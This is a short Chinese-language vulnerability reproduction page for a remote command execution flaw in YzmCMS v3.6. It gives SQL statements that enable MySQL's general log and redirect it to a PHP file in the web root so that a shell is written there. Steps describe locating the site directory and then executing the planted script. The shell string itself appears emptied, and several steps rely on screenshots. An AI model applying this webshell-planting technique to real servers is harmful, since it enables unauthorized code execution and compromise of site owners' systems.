002-YzmCMS v3.6 远程命令执行

# YzmCMS v3.6 远程命令执行

### 一、漏洞简介

### 二、漏洞影响

YzmCMS v3.6

### 三、复现过程

Payload:

“`sql
show variables like ‘%general%’; #查看配置
set global general_log = on; #开启general log模式
set global general_log_file =CONCAT(“E:\\study\\WWW\\YzmCMS\\test.”,”php”);
select ‘‘; #写入shell
“`

1、执行sql语句,查看mysql日志配置情况

![](/static/lingzu/images/15896468533357.png)

2、根据日志文件位置或者默认站点路径来推测站点目录,可用load_file()函数来测试,确认站点目录位置。或者通过phpinfo()等信息收集获取站点目录。

![](/static/lingzu/images/15896468677717.png)

3、分别执行下列sql语句,将脚本代码写入文件:

“`sql
set global general_log = on;

set global general_log_file =CONCAT(“E:\\study\\WWW\\YzmCMS\\test.”,”php”); select ‘‘;
“`

![](/static/lingzu/images/15896468835249.png)

4、提交参数,执行脚本代码:

![](/static/lingzu/images/15896468908470.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容